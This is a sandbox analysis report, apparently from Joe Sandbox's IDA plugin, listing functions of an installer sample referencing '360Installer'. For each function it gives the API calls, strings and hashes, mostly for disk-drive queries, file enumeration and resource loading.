Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __aulldiv$DiskDriveFreeSpaceType_memset
String ID: %d Bytes$%d GB$%d KB$%d MB$%d.%d GB$%d.%d KB$%d.%d MB$c:\
API String ID: 3571217518-3034477485
Opcode ID: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
Instruction ID: 06205a386ba7d022283da15a1f9940b07dac6b6a8ce6b620e37fac85dfda0aa1
Opcode Fuzzy Hash: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
Instruction Fuzzy Hash: 9B41F8B1D00A09BACB08DB76DD8AFBF76F9DB45740F22017EF506F2180E970A9408661

Function 00ACE945 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDriveTypeW.KERNEL32(?), ref: 00ACE976
_memset.LIBCMT ref: 00ACE994
GetDiskFreeSpaceExW.KERNEL32(?,00000000,00000000,?), ref: 00ACE9A6
__aulldiv.LIBCMT ref: 00ACEA0C
__aulldiv.LIBCMT ref: 00ACEA53
__aulldiv.LIBCMT ref: 00ACEA89

Strings

%d.%d GB, xrefs: 00ACEAA7
%d.%d KB, xrefs: 00ACEA21
%d GB, xrefs: 00ACEA95
%d.%d MB, xrefs: 00ACEA68
%d KB, xrefs: 00ACEA18
%d MB, xrefs: 00ACEA5F
c:\, xrefs: 00ACE955
%d Bytes, xrefs: 00ACE9CF

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __aulldiv$DiskDriveFreeSpaceType_memset
String ID: %d Bytes$%d GB$%d KB$%d MB$%d.%d GB$%d.%d KB$%d.%d MB$c:\
API String ID: 3571217518-3034477485
Opcode ID: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
Instruction ID: edb6b5e195339440635a9729c331668f7687a40cc8c7f235ee5a04df7943c14b
Opcode Fuzzy Hash: 1e50d5ae82900a17607b73d37972198517de951a3bd2d0f65fcfff1bc756e1a6
Instruction Fuzzy Hash: 8441C8B5D002097ECB14EB65DD46FBFB6BDEB59741F22042EF606F3190E970890086A5

Function 00AE42DE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 139fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AE42FD
GetDriveTypeW.KERNEL32(?,0000000C), ref: 00AE4327
_memset.LIBCMT ref: 00AE438A
QueryDosDeviceW.KERNEL32(?,00000000,00000400,00000400,?,?,\\.\), ref: 00AE43BA
_wcslen.LIBCMT ref: 00AE43D6
__wcsnicmp.LIBCMT ref: 00AE43E1
CreateFileW.KERNEL32(?,00020000,00000001,00000000,00000003,00000080,00000000,000000FF,?,?,\\.\), ref: 00AE4418
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 00AE4461
CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00AE446C
CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00AE4489

Strings

\Device\Harddisk, xrefs: 00AE43D0, 00AE43D5, 00AE43DC
\\.\, xrefs: 00AE4359

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseDeviceHandle$ControlCreateDriveFileH_prolog3QueryType__wcsnicmp_memset_wcslen
String ID: \Device\Harddisk$\\.\
API String ID: 3469461504-3168084310
Opcode ID: d908e9b294321964e61e607c4e1ddd12551fd0b42f03d9b1d6177a76db0798f3
Instruction ID: d9fa63564d59ec3c7f057a989a54707d2d865b2bb8c391b45de307cf93bd9c85
Opcode Fuzzy Hash: d908e9b294321964e61e607c4e1ddd12551fd0b42f03d9b1d6177a76db0798f3
Instruction Fuzzy Hash: 2B4190716002489BDB20EFA5CD81BFE77B8EF08711F104529FA25A72C1DB305A098A65

Function 00AE1A51 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE1AAD

Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?), ref: 00AE1AE5
_memset.LIBCMT ref: 00AE1B06
DeviceIoControl.KERNEL32(?,0004D02C,?,0000022C,?,0000022C,?,00000000), ref: 00AE1B82
_memset.LIBCMT ref: 00AE1B93
_memcpy_s.LIBCMT ref: 00AE1BA5
CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?), ref: 00AE1BCA

Strings

\\.\PHYSICALDRIVE%d, xrefs: 00AE1AB9

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s_vswprintf_s
String ID: \\.\PHYSICALDRIVE%d
API String ID: 2739630944-613073274
Opcode ID: 4ba97d89a55a86ab0ca1ec5d7c0291d83dd35cb3d6211233f4e77a579b672192
Instruction ID: e95f118c064d708ac1dcba8330d9e08fe78d997cf2d59dc7f6663abc3a9ec000
Opcode Fuzzy Hash: 4ba97d89a55a86ab0ca1ec5d7c0291d83dd35cb3d6211233f4e77a579b672192
Instruction Fuzzy Hash: 3B41F871901298ABDB31DFA8DC45FDE7BA8AF09714F10051AEA18EB281E6719A44CF60

Function 00AE18BD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE1918

Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?), ref: 00AE194F
_memset.LIBCMT ref: 00AE196D
DeviceIoControl.KERNEL32(?,0007C088,?,00000021,?,00000210,?,00000000), ref: 00AE19E2
_memset.LIBCMT ref: 00AE19F5
_memcpy_s.LIBCMT ref: 00AE1A07
CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?), ref: 00AE1A2F

Strings

\\.\PHYSICALDRIVE%d, xrefs: 00AE1929

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s_vswprintf_s
String ID: \\.\PHYSICALDRIVE%d
API String ID: 2739630944-613073274
Opcode ID: 6446de3ab9acfe273f7ead0a619345d3f43d4adc07a2e98eb9899f17d23a8fe0
Instruction ID: 7c9369e00d2c42434f984f02a0cbe7ef776ca838201a19fa98b16159e71a1525
Opcode Fuzzy Hash: 6446de3ab9acfe273f7ead0a619345d3f43d4adc07a2e98eb9899f17d23a8fe0
Instruction Fuzzy Hash: 77411C7190028CAFDF31DFA8DC85BEE7BACAB09305F10452ABA58AB182D6715704CF60

Function 00AF2210 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00AF2292
DeviceIoControl.KERNEL32 ref: 00AF22D8
CloseHandle.KERNEL32(00000000), ref: 00AF22E3
_memset.LIBCMT ref: 00AF2358
CloseHandle.KERNEL32(00000000), ref: 00AF23D3

Strings

GenuineIntel:0f8bfbff, xrefs: 00AF239B
\\.\PhysicalDrive%d, xrefs: 00AF2261

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
String ID: GenuineIntel:0f8bfbff$\\.\PhysicalDrive%d
API String ID: 759969516-2564646230
Opcode ID: 7593da1d3b45a4b05e74582526a7f615f967db9b02f25a301a9b6a4f1bd41b66
Instruction ID: cdbc62d4543d59a54afb727bdb96a8818b7c2ecbfef62cd682c0b4aaac52521a
Opcode Fuzzy Hash: 7593da1d3b45a4b05e74582526a7f615f967db9b02f25a301a9b6a4f1bd41b66
Instruction Fuzzy Hash: B3519AB0508744AFE370DF64CC81BABB7E8AB88705F404A2DF699D7281E77499098B57

Function 00AE2158 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AE2177
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00AE21BD
_memset.LIBCMT ref: 00AE21DF
DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00AE2236
_memset.LIBCMT ref: 00AE226C
CloseHandle.KERNEL32(?,?,?,?,?,?,00000038), ref: 00AE22A9

Strings

\\.\PHYSICALDRIVE%d, xrefs: 00AE219D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$CloseControlCreateDeviceFileH_prolog3Handle
String ID: \\.\PHYSICALDRIVE%d
API String ID: 1408917728-613073274
Opcode ID: 69567b7e03546c7cb5ff2a959ab11a59196c4c8b5daaa866b7873842e03dcdb2
Instruction ID: fd62447266bc55b767c80f77540a77d7f2295971522fe395225eb81092f9e301
Opcode Fuzzy Hash: 69567b7e03546c7cb5ff2a959ab11a59196c4c8b5daaa866b7873842e03dcdb2
Instruction Fuzzy Hash: B6414DB1A0024CAFDB21EFA4DD45AEF77B8EF48704F00452AF915A7292EB745A058B64

Function 00AE1BEB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE1C3E

Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,?), ref: 00AE1C6F
_memset.LIBCMT ref: 00AE1C90
DeviceIoControl.KERNEL32(?,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 00AE1CF8
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE1D29

Strings

\\.\PHYSICALDRIVE%d, xrefs: 00AE1C4C
SCSIDISK, xrefs: 00AE1C9D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
String ID: SCSIDISK$\\.\PHYSICALDRIVE%d
API String ID: 3752575622-3226356902
Opcode ID: 316acabf2617c35ee6c9eed52be9c3738789bb53a046b297c744c1857b21605e
Instruction ID: 16f086ba3435ca842f34cfeef2c98d7a28ef01a47ad3748a19c969e5f4b8be10
Opcode Fuzzy Hash: 316acabf2617c35ee6c9eed52be9c3738789bb53a046b297c744c1857b21605e
Instruction Fuzzy Hash: 1D310FB194028CAFEF32DFA4DC85EDE7BACAB09704F14411AF918EB191D7715604CB11

Function 6C5EE2B7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5ED57F: FindClose.KERNEL32(?,?,6C5EE2C1,?,?,00000000,6C5FDE81,?,?,?,?,?,?,00000034), ref: 6C5ED599

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000034), ref: 6C5EE2E3
GetFullPathNameW.KERNEL32(?,00000104,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000034), ref: 6C5EE300
SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,00000034), ref: 6C5EE313
lstrlenW.KERNEL32(?,?,?,00000000,6C5FDE81,?,?,?,?,?,?,00000034), ref: 6C5EE31E
_wcsrchr.LIBCMT ref: 6C5EE32F
_wcsrchr.LIBCMT ref: 6C5EE339

Strings

*.*, xrefs: 6C5EE2CE, 6C5EE2D3, 6C5EE2E2, 6C5EE2FF

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
String ID: *.*
API String ID: 3086268848-438819550
Opcode ID: 55a04bc9f5f8500ac00d5f649fe2dcbc3eddec2aefc25fcb4cb56237c8ab2c2b
Instruction ID: 23854570f4ec3a650be4a6be1b179317bb2181028e2c66293887193171226b77
Opcode Fuzzy Hash: 55a04bc9f5f8500ac00d5f649fe2dcbc3eddec2aefc25fcb4cb56237c8ab2c2b
Instruction Fuzzy Hash: C21108B13257059BD310AA724CC4F5B32ACDF8E749F040939EA19D2B42F7B0B80487B8

Function 00ACD71E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ACCF8A: FindClose.KERNEL32(?,?,00ACD728,00000190,?,?,00AD956F,?,?,?,?,?,?,?,0000000C), ref: 00ACCFA4

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD74A
GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD767
SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD77A
lstrlenW.KERNEL32(?,00000190,?,?,00AD956F,?,?,?,?,?,?,?,0000000C), ref: 00ACD785
_wcsrchr.LIBCMT ref: 00ACD796
_wcsrchr.LIBCMT ref: 00ACD7A0

Strings

*.*, xrefs: 00ACD735, 00ACD73A, 00ACD749, 00ACD766

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
String ID: *.*
API String ID: 3086268848-438819550
Opcode ID: e4256d1ff9865fd490a0121b2f28785fb4a9640b9ef2bbb8e82928ebd46c2293
Instruction ID: 5c3b7bf230276bc25b39311f96f506f0ff228256a32fa16cc6129efa8e07eacc
Opcode Fuzzy Hash: e4256d1ff9865fd490a0121b2f28785fb4a9640b9ef2bbb8e82928ebd46c2293
Instruction Fuzzy Hash: 0711C1B16003046FD7206B715D89F3B72ECEF55756F12093DFA16E7141EAB0980587A5

Function 00AF25D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783

CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,00AF335B,?,00000064), ref: 00AF2645
_memset.LIBCMT ref: 00AF267A
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 00AF26A2
_memset.LIBCMT ref: 00AF26BA
CloseHandle.KERNEL32(00000000), ref: 00AF2708

Strings

\\.\PhysicalDrive%d, xrefs: 00AF2621

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
String ID: \\.\PhysicalDrive%d
API String ID: 3752575622-2935326385
Opcode ID: c59ed489a44b0a5e7a623fcc84febd13a7a9012fb0e0407d17dda866c1db1c36
Instruction ID: e2747d5362c94e0edc721bde1c89ac8d0aa7caf11f36f967aa5b055067483e78
Opcode Fuzzy Hash: c59ed489a44b0a5e7a623fcc84febd13a7a9012fb0e0407d17dda866c1db1c36
Instruction Fuzzy Hash: 28418F71504344AFE324EB69DC86EAFB3E8FFC9700F400A1DF69893191EB7099448B62

Function 00ACD292 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ACD2C2
FindFirstFileW.KERNEL32(?,?), ref: 00ACD2FE
FindNextFileW.KERNEL32(00000000,?), ref: 00ACD330
FindClose.KERNEL32(00000000), ref: 00ACD33E

Strings

., xrefs: 00ACD31E
\*.*, xrefs: 00ACD2DB

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Find$File$CloseFirstNext_memset
String ID: .$\*.*
API String ID: 1570986888-3701014519
Opcode ID: a56ade99769d771a49854afca2afffcf9f980ee1637b76e90ada830297aa6aa9
Instruction ID: b04d93c7af8d94c8ab8395706bf913390a5247270c2d1eee48600e17c989c2e2
Opcode Fuzzy Hash: a56ade99769d771a49854afca2afffcf9f980ee1637b76e90ada830297aa6aa9
Instruction Fuzzy Hash: C711C4B6900218ABCB20EBB5DC49EEB77BCEB49310F4041B5F625E3141E7349E458B95

Function 00AE0145 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE0152
FindResourceW.KERNEL32(00000000,?,?,DLL), ref: 00AE0163
SizeofResource.KERNEL32(00000000,00000000,00000000), ref: 00AE0174
LoadResource.KERNEL32(00000000,00000000), ref: 00AE0180
LockResource.KERNEL32(00000000), ref: 00AE018B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof_memset
String ID:
API String ID: 3046278646-0
Opcode ID: 269768ec1ee68fd81545c50cb1f6637931c844b6eb3fd96986a33f9541e1e568
Instruction ID: fc394137c048ca20b4cdd32035624786b867f4d4818c28265fd47f53d0fa044d
Opcode Fuzzy Hash: 269768ec1ee68fd81545c50cb1f6637931c844b6eb3fd96986a33f9541e1e568
Instruction Fuzzy Hash: B1F062725002057FCB219F66EC08A9B7F68EF04762F004024F91897210DB71C851DB90

Function 00ADDA24 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00B5C628,00B5C628,00B5CDBC,00000000,00B5C68C,0294F440), ref: 00ADDA53

Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B

Strings

360Installer, xrefs: 00ADDA32

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: PrivateProfileString_wcsnlen
String ID: 360Installer
API String ID: 4066129061-2026047672
Opcode ID: b42ce50ed83f0d27eaa7d54aa02437415e801fa554ed48964767d0d07c20b0d9
Instruction ID: 71858da7d662e690c4390b73b8426eb41d08927ec9979b7ce5eb36b5005f3a4c
Opcode Fuzzy Hash: b42ce50ed83f0d27eaa7d54aa02437415e801fa554ed48964767d0d07c20b0d9
